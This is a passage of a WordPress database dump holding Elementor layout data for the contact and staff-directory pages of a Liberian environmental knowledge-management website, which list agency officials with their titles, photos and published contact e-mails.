href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24759,3671,'_elementor_edit_mode','builder'),(24760,3671,'_elementor_template_type','wp-page'),(24761,3671,'_elementor_version','3.0.16'),(24762,3671,'_wp_page_template','default'),(24763,3671,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":